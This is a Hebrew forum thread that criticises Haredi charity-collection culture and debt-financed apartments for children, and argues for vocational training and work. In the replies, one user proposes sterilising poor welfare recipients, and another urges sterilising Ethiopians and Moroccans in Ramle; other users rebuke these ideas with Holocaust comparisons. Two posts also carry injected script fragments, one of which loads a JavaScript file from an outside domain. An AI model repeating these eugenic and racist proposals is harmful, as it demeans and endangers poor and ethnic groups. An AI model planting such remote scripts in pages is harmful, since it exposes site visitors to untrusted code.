בית פורומים עצור כאן חושבים

תרבות השנור: מפעלי הצדקה והצדקת הצדקה (וגם תוכנית כללית עבור הציבור)

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-8/1/2019 09:17 לינק ישיר 
תרבות השנור: מפעלי הצדקה והצדקת הצדקה (וגם תוכנית כללית עבור הציבור)

זה הולך להיות אשכול יומרני אבל כזה שנועד להביא שינוי ולתקן את העולם שלנו.

סיכום מראש לפני הדיון:

עלון צדקה עורר את הכותב לכאוב את הכאב של חברה שגוזרת עוני וחובות על ילדיה, ומכניסה הורים למצוקה שפוגעת בבריאות ובמקרה זה עלתה לאדם אחד בחייו.

הדיון מתחלק לפרקים:

צדקה בעולם היהודי ובציבור החרדי. אנו אוהבים לתת.

וגם: הולדתן של ועדות הצדקה, הטוב והרע.

והיה העקוב למישור והצדקה כדרך חיים, וגם סיפורו של עגנון.

מצוקת הדיור בחברה הישראלית של היום

סיפורו של ש. ל. כדוגמה מייצגת.

לקחים, או תורה עם דרך ארץ: הגיע הזמן ללמוד מקצוע.

ועוד התנצלות של הכותב: האם ראוי להעלות את הנושאים העדינים האלו בפומבי? אולי צריך להציעם בפני גדולי הדור, מפה לאוזן? והם יתקנו?

ובכן, יש מקום לחשוש שלא כל אלו המוגדרים גדולים יסכימו להערות הבאות, וזה לא אומר שאני טועה אלא שיש כאן חילוקי דעות. גם לא ברור עד כמה נוח ואפשרי להיכנס אל "הגדולים". ונקודה אחרונה, שהועלתה בעבר: האם גדולים יכולים להורות נגד הקונצנזוס? מה יקרה לגדול שיאמר שצריך ללכת לעבוד? איך התקבלו הדברים המיוחסים לרב שטינמן, שמי שלא ראה ברכה בלימודו ולא נהיה למשל בעל משרה יעזוב את הכולל ויעבוד לאחר חמש שנים, וכמובן לא יפרוש מלימודו בזמנו הפנוי?

בהתחשב בכל זאת, אני מרשה לעצמי לכתוב את הדברים הבאים, שנובעים מרגש עז ולא רק מחשיבה מסודרת והגיונית ככל האפשר.

אולי דווקא בגלל שהם נאמרים במקומות כאלו, אצלנו בפורום, אצל אחרים, כמו חברנו בצלאל כהן בפייסבוק, יש סיכוי שהם יהדהדו עד שיגיעו אל הגדולים. אז אולי יגיעו למסקנה שיש ציבור גדול דיו שרוצה אחרת.

מכאן מתחיל השינוי.

דווח על תוכן פוגעני

נשלח ב-8/1/2019 09:18 לינק ישיר 

הצדקה והברכה

יהודים אנחנו, ושמחים על ההזדמנות לתת צדקה.

רגש אנושי של אחוות אדם מפעם בנו, ואנו חשים דאגה לגורלו המר של הזולת.

וההלכה מצווה עלינו שלא להעלים עין ולא לקפוץ את ידנו אלא לתת לזקוק.

ואנו עושים זאת בשמחה.

הפוסקים קבעו חובה שכל אדם יתן חלק קבוע מהכנסותיו, עשירית היא המעשר, ויחלק את זה למטרות צדקה.

ואנו החרדים נתבעים ונותנים.

והצדקה הדרושה אינה זו שמחלקים לעניים המגישים יד ברחוב. הצדקה הנחוצה היא לאלו שבדרך כלל מסתירים את מצוקתם. לטובתם נחלצים קרובים וחברים ורבנים שמכירים את הסיפור ומנסים לארגן סכומים שיכולים לעזור.

וכיון שהנזקקים מסתתרים, וכיון שהצדקה המעולה היא זו שבה אין הנותן מכיר את המקבל, יש מתווכים. וכיון שזו מלאכה רבה מדי עבור אדם אחד, להיות מתווך, יש ארגונים.

וכאן מתחילות שאלות.

איך יש לבחור את יעדי הצדקה? איך יש לבחור את הנזקקים? הרי לא כל התרומות יספיקו לכולם.

יש גדרים בהלכה, אבל המתרימים אינם מקפידים עליהם. הם מפרסמים את המצוקות, והבוחר יבחר.

וכאן מתחילות בעיות. האם ניתן לסמוך על המפרסמים והמחלקים? כמה מן הכסף הנאסף מגיע למטרתו וכמה מממן – לפעמים בצדק כי מגיע תשלום ולפעמים מתוך ניצול לרעה – את האוספים והמתווכים?

ועדי צדקה מקיימים קשר רצוף עם רבנים שמאשרים את פעילותם, מעידים שהכל בסדר, ולעתים מפקחים על החלוקה, או מממנים מחלקים. אבל מטבע הדברים לא תיתכן שקיפות. ואם אין שקיפות, זו הזמנה לקחת חלק מן התרומות לא רק לצרכי תחזוקה אלא גם כמשכורות וכו' וכו'.

וזו לא הבעיה היחידה. ההבטחות המדומיינות לארגן ברכות ותפילות של רבנים מפורסמים, שרק את חלקן ניתן לקיים. הסיפורים המומצאים על ברכות והצלחות שבאות עם התרומות. זה דגם פסול מבחינה חינוכית. ואולם העוסקים בתחום אומרים שהמטרה מצדיקה את האמצעים, שהסיוע לנזקקים מצדיק את זה.

כל אלו נושאים שיש לדון בהם וכבר דנים בהם. אני רוצה להתייחס לשאלה שעד כמה שידוע לי הועלתה לראשונה לפני עשרות שנים בידי סופר יהודי שביקר אותה באחד מסיפוריו.

תרבות השנור.

דדווח על תוכן פוגעני

נשלח ב-8/1/2019 09:18 לינק ישיר 

והיה העקום לערך

הסיפור נקרא "והיה העקוב למישור" (עקוב=עקום). המחבר הוא שמואל יוסף עגנון, סופר דתי ושומר מצוות שמתח, בין השאר, ביקורות על תופעות בחברה הדתית של ימיו (אז לא היו חרדים רשמיים).

בסיפור הארוך הזה הוא מספר על מנשה-חיים, בעל מכולת שהפסיד אותה ומעתה לא היה מסוגל לפרנס את משפחתו, ולאחר שניסה למצוא דרכים להתפרנס נאלץ – ובהמלצת אשתו - לבחור בדרך האחרונה שנותרה לו: איסוף צדקה. הוא קיבל מכתב המלצה ויצא לחזר על הפתחים בעיירות היהודיות. הקשר עם הבית ניתק בינתים.

עגנון מתאר את התהליך הפסיכולוגי שעובר על האדם הנורמטיבי שהופך לקבצן, ניתוח ראוי לתשומת לב.

ואז מגיע הסיפור אל אחד משני הרגעים הגדולים שלו. מנשה-חיים הקבצן החדש מקבל הצעה מקבצן ישן: למכור את המכתב שלו תמורת סכום יפה. הוא מסכים ובכך הוא פותח את הדרך להמשך.

הקבצן הישן מת ובימים ההם לא היו אמצעי זיהוי. המכתב שהיה בידו מזהה אותו בתור מנשה-חיים ולאחר דיונים מסכימים הרבנים להתיר את אשתו מעגינותה.

מנשה-חיים חוזר הביתה בדיוק כדי לגלות שאשתו התחתנה שוב והיא בהריון. אם יגלה מיהו, היא תצא מבעלה והילד יהיה ממזר. וכמובן הוא לא יוכל לקבל אותה בחזרה (הוא כהן, אבל היא אבודה גם אילו היה ישראל). היא אבודה לו בכל מקרה.

לכן מנשה חיים מחליט להעלם ולהשאיר אותה באושרה.

החלק השני ראוי לדיון בפני עצמו, והבאתיו רק עבור הקורא הסקרן. מה שמעניין אותי זה החלק הראשון.

המצב שבו אדם בוחר להיות קבצן, ומגלה שזה מקצוע.

אציין רק נקודה אחת שמצדיקה את הכותרת של הפרק הזה. בעיני מבקרים ספרותיים, עגנון האמין שהעקוב באמת הפך למישור, שמנשה חיים כיפר בסבלו ושתיקתו על החרפה של יציאתו לקבצנות. אני סבור להפך. העקוב, תופעת הקבצנות, הופך למישור, לדרך חיים של יהודים בעולם שבו לא מצאו לעצמם פתרונות אפשריים ראויים יותר. זה לא "מישור" באמת. זה מישור בעיני הקהילה היהודית הרחבה אבל בוודאי תופעה פסולה במבט אובייקטיבי (וכן, זו הזמנה לדיון על ערכים ועל פרשנות. אתם צודקים. רק הבעתי את עמדתי).

וגם אצלנו, החרדים, קבצנות ואיסוף שנור הם דרך של לכתחילה. ועל זה אני רוצה לכתוב.

דדווח על תוכן פוגעני

נשלח ב-8/1/2019 09:19 לינק ישיר 

החברה המודרנית ורכישת דירה

אני מניח שיש מחקרים על תופעת העוני ותופעת הקבצנות, ואין בידי לנסות להכירם וכל שכן לסכמם. אני חייב לציין שיש מקרים שבהם אין מנוס מהישענות על הציבור, על רחמים, על סיוע. יש כאלו שאינם מסוגלים לדאוג לעצמם לחלוטין. יש כאלו שאינם מסוגלים לעזור לעצמם זמנית. יש מטלות שהן בלתי אפשריות גם עבור אדם שמוכן לעבוד קשה.

מי יכול להרשות לעצמו לקנות דירה? שיקום.

ידעתי.

כולם נשארו לשבת.

אחד הרגעים הקריטיים בציבור שלנו או בכל הציבור היהודי בארץ, ולמעשה גם במדינות אחרות, זה הרגע בו מחתנים ילדים.

ההוצאות הן ענקיות. והדאגה לדירה היא המרכזית והגדולה מכולן.

הורים רבים מגלים שאם עשו מאמצים כל חייהם להתפרנס בהתאם לאמצעים שהיו להם, ואפילו לחסוך, מחיר הדיור לזוג הצעיר הוא מעל ליכולת שלהם.

לא אפרט נתונים כלכליים. זה לא התחום שלי. אבל הנושא הזה מפורסם מאד. ויש מפלגה שקמה והצליחה לזכות לייצוג נאה בכנסת רק בגלל שהבטיחה לפתור את בעית הדיור. לפחות עבור אנשים עובדים. אי אפשר לומר שהם הצליחו. שוב, כלכלה זה לא התחום שלי ודי לי להצביע על כך שהבעיה בלתי אפשרית עבור רבים, ומשפחות רבות ממשיכות לחיות בשכירות.

גם אצלנו.

ומנגד – יש תביעה לקנות דירות לזוגות הצעירים, בחור הישיבה שהופך לאברך ואשתו שתעבוד בבית ובחוץ כדי להחזיק בן תורה.

אם זה אפשרי זה נפלא. אבל גם עבור פרוייקט כלשהו בעיר רחוקה מהמרכז או עבור השקעה בדירה להשכרה כדי לממן בשכירות דירה קטנה יותר במקום מרכזי – גם זה מעל ומעבר.

וזה אצל מי שמחתן אחד. ומה יעשה מי שמחתן יותר ילדים, ב"ה?

למשל שמונה בבת אחת?

דדווח על תוכן פוגעני

נשלח ב-8/1/2019 09:20 לינק ישיר 

מצוקה מבחירה

איני יודע מיהו. אזהר ואציין את שמו רק בראשי תיבות. ל. ש.

ל. ש. לפי התמונה על העלון שמופץ כרגע, נראה אדם לא צעיר, שזקנו כבר מלבין. כובע השטריימל מזהה אותו כחסיד ויתכן שגם מאפשר לנחש מאיזו חסידות הוא בא.

התואר "הגה"ח" עשוי לרמז שהוא בעל משרה תורנית כלשהי, או שזו דרך להעצים את רצונו הטוב של התורם לתת כסף למשפחה של תלמיד חכם שנפטר.

מצד שני, אולי הוא עובד באיזה מקום ופשוט לא סיפרו על זה? היו תקופות שועדות צדקה הדגישו שהמוטב הוא תלמיד חכם. והיו תקופות, לא ייאמן, שהדגישו שהוא עובד לפרנסתו. הרגשתי האישית היתה שראוי יותר לעזור למי שמנסה לעבוד. איני יודע מה המקרה כאן. אבל העילה לטרגדיה היא רצף השמחות הגדול של נישואי הילדים.

שמחות שעולות ביוקר. כן.

לפי התיאור, ל. ש. חיתן שמונה ילדים בזמן קצר. לא ברור לי איך זה אפשרי ולמה חכו כל כך הרבה, אבל זה יכול לקרות. לפי התיאור בדף, כל מה שנשאר עכשו להחזיר הוא סכום של עשרת אלפים שקלים לחודש. לא כתוב כמה חודשים או שנים צריך לשלם את הסכום הזה.

גם לא ברור אם הוא קנה דירות לילדיו. הרבה שאלות פתוחות. אמנותו של מחבר העלונים הוא לגלות טפח, להדגיש טפחים של מעלות ולהסתיר את כל השאר.

עם זאת, אפשר להבין של. ש. נסע לחו"ל לאסוף כסף, כנראה לארה"ב. היה לו מאורע לא סימפטי. הוא אסף סכום גדול של צדקה, הפקיד אותו אצל המארח שלו. במוצש המארח הכחיש את הכל. (היה עליו לארגן שטר כמובן. הוא עבר על ההלכה. אפשר וקל להבין למה ועדיין נהג ברשלנות).

הסיפור הזה הוא כנראה אופייני. גם הצורך לאסוף כסף בצדקה. גם ההשלכות המסוכנות לבריאות. בדיחה בני ברקית אכזרית קובעת שחתונה והתקף לב לאבות בעלי החובות הם ענין נפוץ. זו בדיחה מרושעת, ואני משער שאין לה כמעט בסיס. במקרה זה, לפי העלון זה הרקע למותו בלא עת של ל. ש. לבו לא החזיק מעמד מול העול להחזיר הלואות בזמן.

מה שלא ברור לי זה איך מספיק להם סכום של עשרת אלפי שקלים לחודש כדי לפרוע. האם אסף קודם לכל מספיק. האם הגיע להסדר פרישה ארוך טווח? החוב והפרישה היו קיימים, לפי העלון, לפני שנפטר.

דדווח על תוכן פוגעני

נשלח ב-8/1/2019 09:21 לינק ישיר 

סדר עדיפויות ותוכנית לעתיד

כאן אני הולך לעסוק בנושא אחר, לא בסיפורו של ל. ש שאיני יודע מיהו.

יש כאלו שמחזרים על הפתחים וקל להיתקל בהם במקומותינו. מי שגר בבני ברק, בירושלים בשכונות החרדיות, ביישובים החרדיים – הם דופקים בדלת ומבקשים "הכנסת כלה". לרובם יש מכתב כזה או אחר.

יצא לי לפגוש כאלו שסיפרו לי: קניתי כך וכך דירות לכך וכך ילדים. ברוך השם. עכשו אני צריך להחזיר חובות. תעזרו לי.

ובכן, רבותי, זו לא צדקה. זה ניצול.

מי שקנה דירה לילדים, ונקלע לחובות, שיתכבדו הילדים וימכרו את הדירה והאב יחזיר.

מי שלוקח הלוואות כדי לקנות דירה לילדים ואין לו להחזיר – גזלן, פסק אחד מהרבנים החשובים בציבור שלנו (מודעה של הרב סילמן).

מה יעשו אלו שרוצים להתחתן?

יש לי רעיון. רעיון כל כך מהפכני שאיני יודע אם הנייר יישא אותו. או המחשב.

שילכו לעבוד.

שילמדו מקצוע.

שיעבדו וילמדו בשאר הזמן.

גם האב וגם הילדים.

שלא ישליכו את עצמם על הציבור.

איני יודע אם לנפטר האומלל יש חובות בגלל שקנה דירות, ואולי היה צריך לממן רק חצי דירה כי את השאר נתן הצד השני, ולצד השני היה, אז מה אשם הזוג.

אז אני כותב על התופעה.

לדעתי אסור לתת כסף למטרות של רכישת דירה עבור חתונה.

שילכו לעבוד. עבודה זה לא איסור. ואפשר ללמוד ולעבוד גם יחד. אבל זה נושא לפעם אחרת, תוכנית הלימודים וניצול הזמן.

איך אמרו רבותינו: יפה תלמוד תורה עם דרך ארץ. הכוונה לעבודה, לפרנסה.

מדוע אני כותב זאת כאן? וכי היכן אכתוב? והיכן יש קהל שאולי ישמע?

איני הראשון אומר זאת. באשכול ישן נושן על דוד זריצקי, הסופר, הוזכר שהכין מאמר (או סדרה?) בנושא עדין זה, וכל מעלותיו וכל זכויותיו לא עמדו לו. הוא הושמץ. הוא נפטר מצער. הסיפור לא מוכר לי, אבל לקחתי אותו לתשומת ליבי.

האם השינוי יתחיל מלמעלה? מרבנים שיעזו לומר לצאן מרעיתם: למדו מקצוע ולכו לעבוד. (לא מספיק לעבוד בלי רכישת מקצוע, עדיף אקדמי, ולכן צריך מכללות מתאימות ומרצים מתאימים, וזה נושא נוסף). יש כאלו רבנים פה ושם, אבל הם לא יהינו להתבטא בציבור, לחתום על מודעות ועלונים. זה יעלה להם בציבור שיחרים אותם. כך זה בינתים.

האם השינוי יתחיל מלמטה? כן. והוא קורה כעת. אלו הם מה שמכנים "החרדים החדשים" שאינם אלא יהודים מהסוג של פעם, אלו שמימנו את דור האברכים וכעת הם קשישים, וכעת צאצאיהם, שהפכו להורים, אינם מסוגלים לממן ברוב המקרים את עלויות הנישואין והדירות. הדור השלישי, חלקן לפחות, חי ביחידות דיור יקרות, קטנטנות ולעתים גם לא בריאות.

אז הנה ההמלצה:

שנו את הדגם. לא רק שראוי לשלב עבודה עם לימוד תורה. זה ה-לכתחילה.

ספקו מקומות לרכישת מקצוע. (נושא למאמר נפרד).

הקימו מקומות עבודה (נושא למאמר נפרד) או סכמו עם מקומות עבודה שיתנו אפשרות לחרדים להיקלט (יש שמעוניינים. זה כיום עבור נשים ויכול להיות עבור גברים גם כן).

אפשרו והמליצו לצעירים להתנדב לתחליף שירות לאומי במקום צבא. במסגרות כמו "הצלה", "עזר מציון", זק"א ויש עוד הרבה מה לעשות. לפי המעט שידוע לי, הממשלה תסכים להכיר בזה כתחליף לצבא וזה יפטור את בעית הגיוס וזה יעניק נקודות לקראת תיקצוב ועוד הרבה מעלות.

ייעלו את תוכנית הלימודים הישיבתית כדי להכין את האברך לחיים שבהם ילמד איך לומדים, ילמד תשתיות ללימוד עתידי בעצמו, ידע הלכות ואיך לחפש אחריהן, ואיך שואלים שאלת חכם.

אכיר תודה למי שיעלה את הדברים לפייסבוק של הקבוצות שפעם הייתי חבר בהן על שם "מיימוני". כך הדברים יופצו עוד יותר.

אכיר תודה למי שיעביר את הדברים לכל פירסום אפשרי.

השינוי מתחיל כאן. עכשו.

לתגובות ורעיונות והצעות:

[email protected]

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 00:45 לינק ישיר 
שרפ

האמת שאני מנסה להבין האם התרומה של "הכנסת כלה" לציבור החרדי, היא בכלל מצווה או שמדובר בעבירה.

הרי כל תרומה שלי לחתונת משפחה עניה תגרום ליצור עוד 10 עניין שיפלו על ילדי בבקשת "הכנסת כלה", לעתיד לבוא.

לענ"ד זה עניין של המדינה ברמה הציבורית להקטין את העניים. הדרך היעילה ביותר היא לזהות אותם מוקדם ולסרס אותם. אפשר למשל לקבע שמי שמבקש הנחה בארנונה/קיצבאות נכות/משפחה יחידנית/גבר שלא משלם מזונות וכד' הוא יקבל אותן בתמורה לסירוס בלבד.

הפתרון הוא הומני בכך שיופסק ייצורם של עניים, רבים ישקלו האם בכלל כדאי להם ליפול על הציבור בבקשת תמיכה אם אין להם פתרון אחר, רבים יחנכו את ילדיהם להתפרנס.

תוקן על ידי שרפ ב- 12/01/2019 23:25:11

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 07:10 לינק ישיר 

כדאי לסרס גם את האתיופים והמרוקאים ברמלה כי הם שכבה עניה< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js">

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 07:56 לינק ישיר 

כבר קדמך בחזון איש ביצוע במרכז אירופה בשנת ה 30 

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 08:16 לינק ישיר 

שרפ

ברוך השב!

כתבת כמה רעיונות ובחלקם נראה שלא נזהרת בלשונך וראה אלו תגובות גררת.

להתבטא באופן של "למנוע ייצור עניים" זה נשמע כמו הצעת חיסול... בוודאי לא לכך נתכוונת.

והרי אתה חבר ותיק ודברי הטעם שלך מתנוססים ברחבי הפורום.

עצם השאלה היא חשובה. האם אדם שאינו מסוגל לפרנס את צאצאיו זכאי/רשאי/חייב להמשיך להוליד הרבה ילדים. או שמא עליו ועל אשתו להשתמש באמצעי מניעה?

לפי האופן שפוסקים מתייחסים לענין נראה שאסור להימנע מהעמדת ולדות אבל זה ודאי אינו נכון וכבר דנו בכך באשכולות שונים. לאחר שהולידו בן ובת אין ממש חיוב. למשל אם האשה קשה לה. ומותר לה אפילו למנוע מעצמה כל אפשרות להוליד עוד, כך רואים ממעשה שהיה בגמרא. כמובן זה לא מומלץ. אבל דחיה זמנית ודאי אפשרית ואין צורך לשאול רב.

ורק הערתי כי מתבקש להעיר על כך.

ובחזרה לנושא - האם תיכנון המשפחה והצבת רווח בין לידות למי שזוכה לפריון מרובה הם חיוניים? איזו תביעה זו, מוסרית, הלכתית, משפטית, חוקי המדינה שצריך לחוקק?

כמובן, זה בהחלט אפשרי שהמדינה או כל גוף סיוע יתנו את הסיוע שלהם בכך שאדם קודם כל יעשה את המאמצים לקחת אחריות לילדיו שלו לפני שיפנה לציבור.

וזה אינו קשור בהכרח לנושא שהצגתי אני על כל הבטיו. אבל המשך כזה גם כן חשוב ומתבקש. לאו דווקא הפתרון שלך כפי שפירשתיו, להטיל חובה להשתמש באמצעי מניעה זמניים, אלא השאלה שלך, האם נכון הדבר לא להימנע מהעמדת ולדות הרבה אם אין באפשרות וברצון ההורים למצוא פרנסה עבור זה.

לא זכור לי שנתקלתי בשאלה בניסוח הזה וזו אכן שאלה, לדעתי. יתכן שהתשובה היא: מה פתאום, ודאי שימשיכו בשלהם כמקודם. ובוודאי צריך לדון בהנחות היסוד. האם ההורים הם השואלים או הסביבה שבאה אליהם בטענות. ולפי איזו מערכת עקרונות נדון בדבר, וכפי שציינתי לעיל: מערכת הלכתית או אחרת.

ואדרבה, נדון בדבר.

ת"ט

לי עצמי לקח קצת זמן להבין מה כתבת ומה החזון איש קשור לפה.

תירגום לעברית: כבר קדם בעל חזון אחד באירופה ברעיון שצריך למנוע ילודה - על ידי חיסול הורים - וזה היה באירופה בשואה.

וזו כמובן אמירה צינית על ניסוח חריף מדי של בעל הכינוי "שרפ" (=חריף). וגם פרוגרמי (ברוך השב) העיר על כך בדרכו שלו.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 10:04 לינק ישיר 

אני מרחם על מי שחי כאן בעוני וחוסר כל, אבל בעבר תקופות של רעב, מגיפות וכד' כילו אותם היום זה ב"ה לא קורה. 

לכן התפקיד שלנו לדאוג שהם לא יתרבו, הן בכך שאדם יחשוב פעמיים האם הוא הופך לנזקק והן בכך שאם הוא נזקק הוא לא יגדל דורות נוספים של נזקקים.

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 10:06 לינק ישיר 
רעיון מעניין

פרוגרמי כתב:
כדאי לסרס גם את האתיופים והמרוקאים ברמלה כי הם שכבה עניה

אבל אם הם מאפשרים לילדיהם להתקדם (רכישת השכלה מתאימה), לתת להם קודם אפשרות ללדת 3 ילדים, אולי הם ישקיעו בהם שיצמחו (היזהרו בבני עניים...).

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 11:04 לינק ישיר 

קהלת פרק ה, יא מְתוּקָה שְׁנת הָעֹבֵד אִם־מְעַט וְאִם־הַרְבֵּה יֹאכֵ¡ל וְהַשָּׂבָע לֶֽעָשִׁיר אֵינֶנּוּ מַניחַֽ לוֹ לִישֽׁוֹן: מפרש החת'ס מתוקה שנת העובד אפילו אם הוא אוכל מעט! אבל השובע לעשיר- זה שהעשיר שבע אינו מניח לו לישון. העוסקים והמפמפמים לעני את מה שהעשיר אוכל ומלמדים אותו לקנא. פוליטית מגדילים את מצוקת העני.

תוקן על ידי ירוחםשמ ב- 13/01/2019 09:10:21

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 11:35 לינק ישיר 

מרוב תדהמה מההצעה של שרפ אני מוצא עצמי צמיץ שוב כאן 
שאלה - למה חיציך מופנים דווקא לגברים?  אגב, הלכתית עדיף לעקר נשים

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 12:17 לינק ישיר 

היכן ראית שחיצי מופנים לגברים בלבד?

דדווח על תוכן פוגעני

נשלח ב-13/1/2019 12:53 לינק ישיר 

זה מה שהיה כתוב   אבל אם אתה שוויוני....
גם ההוא באירופה לא נתן לענייני מיגדר לבלבל אותו (למרות שהמדיניות המפלגתית היתה פטריאכלית להפליא)

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > תרבות השנור: מפעלי הצדקה והצדקת הצדקה (וגם תוכנית כללית עבור הציבור)
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 לדף הבא סך הכל 2 דפים.

bholext